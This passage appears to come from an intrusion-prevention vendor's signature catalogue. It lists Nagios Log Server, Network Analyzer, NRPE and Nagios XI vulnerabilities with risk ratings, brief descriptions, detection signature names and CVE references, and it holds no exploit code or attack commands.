References:

CVE-2021-35478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35478

Nagios-Log-Server-Create_Snapshot-Stored-Cross-Site-Scripting

About this vulnerability:	A vulnerability in Nagios Enterprises Log Server
Risk:	High
First detected in:	sgpkg-ips-1303-5242
Last changed:	sgpkg-ips-1303-5242
Platform:	Generic
Software:	Nagios Enterprises Log Server
Type:	Input Validation
Description:	A stored cross-site scripting vulnerability has been reported in Nagios Log Server. The vulnerability is due to insufficient validation of user input in HTTP requests submitted to create_snapshot endpoint. A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation:	HTTP_CRL-Nagios-Log-Server-Create_Snapshot-Stored-Cross-Site-Scripting

Nagios-Log-Server-Mail-Settings-Stored-Cross-Site-Scripting

About this vulnerability:	A vulnerability in Nagios Enterprises Log Server
Risk:	Moderate
First detected in:	sgpkg-ips-1309-5242
Last changed:	sgpkg-ips-1309-5242
Platform:	Generic
Software:	Nagios Enterprises Log Server
Type:	Input Validation
Description:	Improper validation of HTTP requests causes a cross-site scripting vulnerability in Nagios. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation:	HTTP_CRL-Nagios-Log-Server-Mail-Settings-Stored-Cross-Site-Scripting

Nagios-Log-Server-User-Profile-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Nagios Enterprises Log Server

Risk:

Moderate

First detected in:

sgpkg-ips-1240-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios Enterprises Log Server

Type:

Input Validation

Description:

Insufficient validation of user profile information in the user profile page causes a cross-site scripting vulnerability in Nagios Log Server. A successful exploit allows an attacker to run arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Nagios-Log-Server-User-Profile-Stored-Cross-Site-Scripting

References:

CVE-2020-6586
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6586

Nagios-Network-Analyzer-Create-Cross-Site-Request-Forgery

About this vulnerability:	A vulnerability in Nagios Network Analyzer
Risk:	Moderate
First detected in:	sgpkg-ips-800-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Nagios
Type:	Input Validation
Description:	The lack of CSRF protection on the user creation form in create_user.php in Nagios causes a vulnerability which can be exploited to create a user with administrative privileges on the target.
Situation:	HTTP_CS-Nagios-Network-Analyzer-Create-Cross-Site-Request-Forgery

Nagios-Network-Analyzer-Report-Generator-Command-Injection

About this vulnerability:	A vulnerability in Nagios Enterprises Network Analyzer
Risk:	Moderate
First detected in:	sgpkg-ips-818-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Nagios
Type:	Input Validation
Description:	A command execution vulnerability in Nagios allows an attacker to run arbitrary code on the target system. The vulnerability is caused by improper validation of HTTP requests relating to report generation.
Situation:	HTTP_CRL-Nagios-Network-Analyzer-Report-Generator-Command-Injection

Nagios-Remote-Plugin-Executor-Arbitrary-Command-Execution

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios Remote Plugin Executor

Risk:

High

First detected in:

sgpkg-ips-521-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios Remote Plugin Executor

Type:

Input Validation

Description:

A command execution vulnerability has been found in Nagios Remote Plugin Executor. The vulnerability is due to insufficient validation of user-provided parameters against shell metacharacters. A remote, unauthenticated attacker could exploit this vulnerability to execute arbitrary commands on the vulnerable machine with the privileges of the affected service.

Situation:

Generic_CS-Nagios-Remote-Plugin-Executor-Arbitrary-Command-Execution

References:

CVE-2013-1362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362

BID-58142
http://www.securityfocus.com/bid/58142

OSVDB-90582
http://www.osvdb.org/90582

Nagios-Remote-Plugin-Executor-Command-Injection

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios Remote Plugin Executor

Risk:

Moderate

First detected in:

sgpkg-ips-580-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios Remote Plugin Executor

Type:

Input Validation

Description:

A command injection vulnerability has been found in Nagios Remote Plugin Executor. The vulnerability is due to insufficient validation of user-provided parameters containing newline characters. A remote, unauthenticated attacker could exploit this vulnerability to execute arbitrary commands on the vulnerable machine with the privileges of the affected service.

Situation:

Generic_CS-Nagios-Remote-Plugin-Executor-Command-Injection

References:

BID-66969
http://www.securityfocus.com/bid/66969

OSVDB-106007
http://www.osvdb.org/106007

Nagios-Statuswml-Cgi-Command-Injection

About this vulnerability:

A vulnerability in Nagios

Risk:

Moderate

First detected in:

sgpkg-ips-766-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios

Type:

Malfunction

Description:

There exists a command injection vulnerability in Nagios. A remote attacker can use this to execute arbitrary commands on the affected system.

Situation:

HTTP_CRL-Nagios-Statuswml-Cgi-Command-Injection

References:

CVE-2009-2288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2288

Nagios-XI--Windows-Winrm-Command-Injection

About this vulnerability:	A vulnerability in Nagios Enterprises Nagios XI
Risk:	Moderate
First detected in:	sgpkg-ips-1834-5242
Last changed:	sgpkg-ips-1834-5242
Platform:	Generic
Software:	Nagios XI
Type:	Input Validation
Description:	Improper validation of multiple fields in the WinRM configuration wizard causes a command injection vulnerability in Nagios. A successful exploitation allows an attacker to execute arbitrarycommands on the target system.
Situation:	HTTP_CS-Nagios-XI-Windows-Winrm-Command-Injection

Nagios-XI-Account-Email-Address-Stored-Cross-Site-Scripting

About this vulnerability:	A vulnerability in Nagios Enterprises Nagios XI
Risk:	Moderate
First detected in:	sgpkg-ips-1364-5242
Last changed:	sgpkg-ips-1364-5242
Platform:	Generic
Software:	Nagios XI
Type:	Input Validation
Description:	A stored cross-site scripting vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient validation of the user's email address in various modules of the application. A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in arbitrary script code execution in the target user's browser.
Situation:	HTTP_CRL-Nagios-XI-Account-Email-Address-Stored-Cross-Site-Scripting

Nagios-XI-Account-Main-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1275-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

Insufficient validation of the theme parameter in account/main.php causes a cross-site scripting vulnerability in Nagios XI. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Nagios-XI-Account-Main-Stored-Cross-Site-Scripting

References:

CVE-2020-10821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10821

Nagios-XI-Ajaxhelper.php-Cmdsubsys-Command-Injection

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1297-5242

Last changed:

sgpkg-ips-1297-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Nagios XI. This vulnerability is due to insufficient validation of the input parameters in the ajaxhelper.php script. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to a target service. Successful exploitation will result in arbitrary command execution by user nagios on the target server.

Situation:

HTTP_CRL-Nagios-XI-Ajaxhelper.php-Cmdsubsys-Command-Injection

References:

CVE-2020-15901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15901

Nagios-XI-Alert-Cloud-Cross-Site-Scripting

About this vulnerability:	A vulnerability in Nagios Enterprises Nagios XI
Risk:	High
First detected in:	sgpkg-ips-509-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Nagios XI
Type:	Input Validation
Description:	A reflected cross-site scripting vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient validation of incoming requests sent to index.php. The vulnerability can be exploited by a remote attacker by enticing the target user to follow a malicious link. Successful exploitation of this vulnerability would allow injection and execution of arbitrary HTML and script code in the target user's browser in the security context of the affected server.
Situation:	HTTP_CSU-Nagios-XI-Alert-Cloud-Cross-Site-Scripting

Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40931

About this vulnerability:

A vulnerability in Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1812-5242

Last changed:

sgpkg-ips-1812-5242

Platform:

Generic

Software:

Nagios XI

Type:

SQL Injection

Description:

An SQL injection vulnerability in the Announcement Banners feature of the Nagios XI versions from 5.11.0 to 5.11.1 allows an authenticated attacker to execute arbitrary SQL commands.

Situation:

HTTP_CRL-Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40931-CVE-2023-40933

References:

CVE-2023-40931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40931

Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40933

About this vulnerability:

A vulnerability in Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1812-5242

Last changed:

sgpkg-ips-1812-5242

Platform:

Generic

Software:

Nagios XI

Type:

SQL Injection

Description:

An SQL injection vulnerability in the Announcement Banners feature of the Nagios XI v5.11.1 and earlier allows an authenticated attacker with banner configuration privileges to execute arbitrary SQL commands.

Situation:

HTTP_CRL-Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40931-CVE-2023-40933

References:

CVE-2023-40933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40933

Nagios-XI-API-Key-Regeneration-Privilege-Escalation

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1123-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios XI

Type:

Malfunction

Description:

Insufficient validation of command options submitted to ajaxhelper.php for the getxicoreajax action causes a privilege escalation in Nagios XI. A successful exploitation allows an attacker to gain administrative privileges on the target.

Situation:

HTTP_CRL-Nagios-XI-API-Key-Regeneration-Privilege-Escalation

References:

CVE-2018-15711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15711

Nagios-XI-Authenticated-Remote-Command-Execution

About this vulnerability:

A vulnerability in Nagios XI

Risk:

High

First detected in:

sgpkg-ips-1234-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Nagios XI

Type:

Input Validation

Description:

There exists a vulnerability in Nagios XI, versions before 5.6.6, which allows remote attackers to execute arbitrary code by uploading a malicious plugin.

Situation:

HTTP_CS-Nagios-XI-Authenticated-Remote-Command-Execution

References:

CVE-2019-15949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15949

Nagios-XI-Autodiscovery-Arbitrary-Command-Execution

About this vulnerability:	A vulnerability in Nagios Enterprises Nagios XI
Risk:	Moderate
First detected in:	sgpkg-ips-512-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Nagios XI
Type:	Input Validation
Description:	An arbitrary command execution vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient validation of incoming requests sent to the Autodiscovery module. The vulnerability can be exploited by an authenticated attacker by submitting a maliciously crafted job to the Autodiscovery tool. Successful exploitation of this vulnerability would allow injection and execution of arbitrary commands on the affected server in the context of root.
Situation:	HTTP_CRL-Nagios-XI-Autodiscovery-Arbitrary-Command-Execution

Nagios-XI-Autodiscovery-Job-Command-Injection

About this vulnerability:

A vulnerability in Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1163-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

There has been reported a command injection vulnerability in the Autodiscovery Job component of Nagios XI. Authenticated attacker could exploit this vulnerability to gain arbitrary code execution on the target server.

Situation:

HTTP_CRL-Nagios-XI-Autodiscovery-Job-Command-Injection

References:

CVE-2019-9164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9164

Nagios-XI-Autodiscovery-WebShell-Upload

About this vulnerability:

A vulnerability in Nagios XI.

Risk:

High

First detected in:

sgpkg-ips-1437-5242

Last changed:

sgpkg-ips-1437-5242

Platform:

Generic

Software:

Nagios XI

Type:

Directory Traversal

Description:

A vulnerability in Nagios XI, versions before 5.8.5, which allow remote attackers to execute arbitrary code by uploading a PHP web shell via a directory traversal in the job id field.

Situation:

HTTP_CRL-Nagios-XI-Autodiscovery-WebShell-Upload

References:

CVE-2021-37343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37343

Nagios-XI-Autodiscovery_Component_Update_Cron-Command-Injection

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1311-5242

Last changed:

sgpkg-ips-1311-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient input validation of the requests submitted to the Auto-Discovery endpoint. A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in arbitrary command execution with privileges of the web server on the target system.

Situation:

HTTP_CRL-Nagios-XI-Autodiscovery_Component_Update_Cron-Command-Injection

References:

CVE-2020-28648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28648

Nagios-XI-Bulk-Modification-Tool-Bulkmodifications.inc.php-SQL-Injection

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1386-5242

Last changed:

sgpkg-ips-1386-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient input validation of requests handled by bulkmodifications.inc.php. A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in execution of arbitrary SQL statements, which may cause disclosure of sensitive information leading to further compromises.

Situation:

HTTP_CRL-Nagios-XI-Bulk-Modification-Tool-Bulkmodifications.inc.php-SQL-Injection

References:

CVE-2021-37350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37350

Nagios-XI-CCM-Admin_views.inc.php-Arbitrary-File-Overwrite

About this vulnerability:	A vulnerability in Nagios XI CCM
Risk:	High
First detected in:	sgpkg-ips-1292-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows; Linux
Software:	Nagios XI
Type:	Input Validation
Description:	There exists a vulnerability in Nagios XI, versions before 5.7.2, which allows remote attackers to overwrite arbitrary files by sending a crafted request to the target server, due to the insufficient validation of the request parameter in admin_views.inc.php in the Static Config Editor tool.
Situation:	HTTP_CRL-Nagios-XI-CCM-Admin_views.inc.php-Arbitrary-File-Overwrite

Nagios-XI-Cmdsubsys-Command-Injection

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

Insufficient input validation causes a command injection vulnerability in Nagios. A successful exploit allows an attacker to run arbitrary commands on the target system.

Situation:

HTTP_CRL-Nagios-XI-Cmdsubsys-Command-Injection

References:

CVE-2018-15709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15709

Nagios-XI-Cmdsubsys.php-Archive-Name-Command-Injection

About this vulnerability:

A vulnerability in Nagios XI.

Risk:

High

First detected in:

sgpkg-ips-1398-5242

Last changed:

sgpkg-ips-1398-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

A vulnerability in Nagios XI, versions before 5.8.6, which allows remote attackers to execute arbitrary code by uploading crafted files to the target server, dudue to lack of input sanitization on the names of user-uploaded archive files.

Situation:

HTTP_CS-Nagios-XI-Cmdsubsys.php-Archive-Name-Command-Injection

References:

CVE-2021-40345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40345

Nagios-XI-Command_test.php-Command-Injection

About this vulnerability:	A vulnerability in Nagios XI
Risk:	Moderate
First detected in:	sgpkg-ips-1276-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Nagios XI
Type:	Input Validation
Description:	There exists a command injection vulnerability in Nagios XI. Successful exploitation could lead in arbitrary command execution.
Situation:	HTTP_CRL-Nagios-XI-Command_test.php-Command-Injection

Nagios-XI-Configwizards-Multiple-Command-Injections

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1340-5242

Last changed:

sgpkg-ips-1428-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

Improper input validation in switch.inc.php and cloud-vm.inc.php cause command injection vulnerabilities CVE-2021-37344, CVE-2021-25297, and CVE-2021-25298 in Nagios XI. A successful exploit allows an attacker to execute arbitrary commands on the target system with the privileges of the vulnerable service.

Situation:

HTTP_CRL-Nagios-XI-Configwizards-Multiple-Command-Injections

References:

CVE-2021-25297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25297

Nagios-XI-Configwizards-Windowswmi.inc.php-Command-Injection

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

High

First detected in:

sgpkg-ips-1333-5242

Last changed:

sgpkg-ips-1333-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient input validation of the requests submitted to the Windowswmi.inc.php. A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in arbitrary command execution with privileges of the web server on the target system.

Situation:

HTTP_CRL-Nagios-XI-Configwizards-Windowswmi.inc.php-Command-Injection

References:

CVE-2021-25296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25296

Nagios-XI-Custom-Includes-Component-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Nagios XI.

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Linux

Software:

Nagios XI

Type:

Insecure Configuration

Description:

A vulnerability in Nagios XI, versions before 5.8.6, which allows remote attackers to upload arbitrary files and execute code by sending crafted HTTP requests to a target server, due to insecure settings in the distributed configuration file in a component directory.

Situation:

HTTP_CS-Nagios-XI-Custom-Includes-Component-Arbitrary-File-Upload

References:

CVE-2021-40344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40344

Nagios-XI-Custom-Includes-Manage.php-Rename_File-Directory-Traversal

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1361-5242

Last changed:

sgpkg-ips-1361-5242

Platform:

Generic

Software:

Nagios XI

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in Nagios XI. Successful exploitation could lead in arbitrary file write and possible code execution on the target server.

Situation:

HTTP_CRL-Nagios-XI-Custom-Includes-Manage.php-Rename_File-Directory-Traversal

References:

CVE-2021-3277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3277

Nagios-XI-CVE-2023-48085-Command_test.php-Directory-Traversal

About this vulnerability:

A vulnerability in Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1704-5242

Last changed:

sgpkg-ips-1704-5242

Platform:

Generic

Software:

Nagios XI

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Nagios XI. The vulnerability is due to improper validation of user data used in a file path in the "command_test.php" script. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary command execution under the security context of the user running the vulnerable server.

Situation:

HTTP_CRL-Nagios-XI-CVE-2023-48085-Command_test.php-Directory-Traversal

References:

CVE-2023-48085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48085

Nagios-XI-Deploy-Dashboards-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1329-5242

Last changed:

sgpkg-ips-1329-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient validation of user inputs when processing requests for Deploy Dashboards feature. A remote authenticated attacker can exploit this vulnerability by sending crafted request to the server. Successful exploitation could result in arbitrary script code execution on the client's browser.

Situation:

HTTP_CRL-Nagios-XI-Deploy-Dashboards-Stored-Cross-Site-Scripting

References:

CVE-2020-27989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27989

Nagios-XI-favorites.inc.php-SQL-Injection

About this vulnerability:

An attempt to exploit a vulnerability in Nagios XI detected

Risk:

High

First detected in:

sgpkg-ips-1714-5242

Last changed:

sgpkg-ips-1714-5242

Platform:

Linux; Unix

Software:

Nagios XI

Type:

Input Validation

Description:

A vulnerability in Nagios XI, versions 2024R1 and earlier, which allows remote attackers to execute arbitrary SQL statements against the target server's database due to improper validation of user data in the favorites.inc.php component.

Situation:

HTTP_CSU-Nagios-XI-favorites.inc.php-SQL-Injection

References:

CVE-2024-24401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24401

Nagios-XI-Helpedit.php-SQL-Injection

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

High

First detected in:

sgpkg-ips-1074-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

There has been reported an SQL injection vulnerability in Nagios XI. A remote attacker can exploit this vulnerability by sending a crafted HTTP request to the target server. Successful exploitation might allow the attacker to read and modify content of the database.

Situation:

HTTP_CRL-Nagios-XI-Helpedit.php-SQL-Injection

References:

CVE-2018-8734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8734

Nagios-XI-historytab_content.php-SQL-Injection

About this vulnerability:	A vulnerability in Nagios XI
Risk:	High
First detected in:	sgpkg-ips-1834-5242
Last changed:	sgpkg-ips-1834-5242
Platform:	Linux; Unix
Software:	Nagios XI
Type:	SQL Injection
Description:	A vulnerability in Nagios XI, versions prior to 2024R1.3.1, which allows remote attackers to execute arbitrary SQL commands on target servers due to improper validation of the user data used in the historytab_content.php script.
Situation:	HTTP_CRL-Nagios-XI-historytab_content.php-SQL-Injection

Nagios-XI-Incident-Manager-Integration-Component-SQL-Injection

About this vulnerability:	A vulnerability in Nagios Enterprises Nagios XI
Risk:	High
First detected in:	sgpkg-ips-771-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Nagios XI
Type:	Input Validation
Description:	There exists an SQL injection vulnerability in Nagios Incident Manager (IM) integration component of Nagios XI. A remote, unauthenticated attacker can use this to disclose sensitive information from the database.
Situation:	HTTP_CRL-Nagios-XI-Incident-Manager-Integration-Component-SQL-Injection

Nagios-XI-Magpie-Curl-Argument-Injection

About this vulnerability:

A vulnerability in Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1118-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

There has been reported an argument injection vulnerability in the Magpie RSS module of Nagios XI. Due to insufficient validation of HTTPS URLs submitted to the service, an unautheticated remote attacker can exploit this vulnerability to get arbitrary code execution on the target server.

Situation:

HTTP_CSU-Nagios-XI-Magpie-Curl-Argument-Injection

References:

CVE-2018-15708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15708

Nagios-XI-Manage-My-Dashboards-Page-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1391-5242

Last changed:

sgpkg-ips-1391-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in Nagios XI. Successful exploitation could result in arbitrary script code execution in the target user's browser.

Situation:

HTTP_CRL-Nagios-XI-Manage-My-Dashboards-Page-Stored-Cross-Site-Scripting

References:

CVE-2021-38156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38156

Nagios-XI-Mibs.php-Command-Injection

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

High

First detected in:

sgpkg-ips-1295-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Nagios XI. This vulnerability is due to insufficient validation of the input parameters in the mibs.php. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to a target service. Successful exploitation could result in arbitrary command execution with the web server privilege on the target server.

Situation:

HTTP_CRL-Nagios-XI-Mibs.php-Command-Injection

References:

CVE-2020-5791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5791

Nagios-XI-Monitoringplugins-Do_Upload-Command-Injection

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1345-5242

Last changed:

sgpkg-ips-1345-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

Improper input validation in the Manage Plugins endpoint causes a command injection vulnerability in Nagios XI. A successful exploit allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CS-Nagios-XI-Monitoringplugins-Do_Upload-Command-Injection

References:

CVE-2020-35578
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35578

Nagios-XI-Nocscreenapi.php-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

High

First detected in:

sgpkg-ips-1220-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in Nagios XI. This vulnerability is due to insufficient validation of the host, hostgroup, and servicegroup parameters sent to the nocscreenapi.php script. A remote attacker can exploit this vulnerability by enticing a target user into clicking a malicious link. Successful exploitation could result in the execution of script code in security context of the target user's browser.

Situation:

HTTP_CRL-Nagios-XI-Nocscreenapi.php-Cross-Site-Scripting

References:

CVE-2019-20139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20139

Nagios-XI-Privilege-Escalation

About this vulnerability:

A vulnerability in Nagios XI

Risk:

High

First detected in:

sgpkg-ips-1112-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios XI

Type:

Insecure Configuration

Description:

A vulnerability in Nagios XI, versions 5.2.6-5.4.12, that allows remote attackers to escalate the DB user to root.

Situation:

HTTP_CRL-Nagios-XI-Privilege-Escalation

References:

CVE-2018-8736
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8736

Nagios-XI-Remote-Code-Execution

About this vulnerability:

A vulnerability in Nagios XI

Risk:

High

First detected in:

sgpkg-ips-1112-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

A vulnerability in Nagios XI, versions 5.2.6-5.4.12, that allows remote attackers to execute arbitrary commands through /nagiosxi/backend/index.php with nopasswd sudo.

Situation:

HTTP_CRL-Nagios-XI-Remote-Code-Execution

References:

CVE-2018-8735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8735

Nagios-XI-SNMP-Trap-SQL-Injection

About this vulnerability:	A vulnerability in Nagios Enterprises Nagios XI
Risk:	High
First detected in:	sgpkg-ips-1298-5242
Last changed:	sgpkg-ips-1298-5242
Platform:	Generic
Software:	Nagios XI
Type:	Input Validation
Description:	An SQL injection vulnerability has been reported in Nagios XI. This vulnerability is due to insufficient validation of the input parameters in the SNMP Trap edit functionality. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to a target service. Successful exploitation could result in the execution of arbitrary SQL statement, potentially leading to the disclosure of sensitive information.
Situation:	HTTP_CRL-Nagios-XI-SNMP-Trap-SQL-Injection

Nagios-XI-Snmptrap-Authenticated-Remote-Code-Exection

About this vulnerability:

A vulnerability in Nagios XI.

Risk:

High

First detected in:

sgpkg-ips-1365-5242

Last changed:

sgpkg-ips-1365-5242

Platform:

Linux; Unix

Software:

Nagios XI

Type:

Input Validation

Description:

A vulnerability in Nagios XI, versions 5.5.0 to 5.7.3, which allows remote attackers to execute arbitrary php code by allowing the upload of a simple PHP shell to includes/components/nxti/index.php, due to insufficient input validation.

Situation:

HTTP_CS-Nagios-XI-Snmptrap-Authenticated-Remote-Code-Exection

References:

CVE-2020-5792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5792

Nagios-XI-Stored-Cross-Site-Scripting-CVE-2018-15712

About this vulnerability:

An attempt to exploit a vulnerability in Nagios XI detected

Risk:

Moderate

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

Nagios XI

Type:

Cross-site Scripting

Description:

A stored cross-site scripting vulnerability has been reported in Nagios XI 5.5.6. Successful exploitation could result in arbitrary script code execution in the target user's browser.

Situation:

HTTP_CSU-Nagios-XI-Stored-Cross-Site-Scripting-CVE-2018-15712

References:

CVE-2018-15712
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15712

Nagios-XI-Two-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1243-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

There has been reported cross-site scripting vulnerabilities in Nagios XI. Successful exploitation could lead in arbitrary script code execution.

Situation:

HTTP_CRL-Nagios-XI-Two-Reflected-Cross-Site-Scripting

References:

CVE-2020-10819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10819

Nagios-XI-Users.php-Do_Update_User-Stored-Cross-Site-Scripting

About this vulnerability:	A vulnerability in Nagios Enterprises Nagios XI
Risk:	Moderate
First detected in:	sgpkg-ips-1281-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Nagios XI
Type:	Input Validation
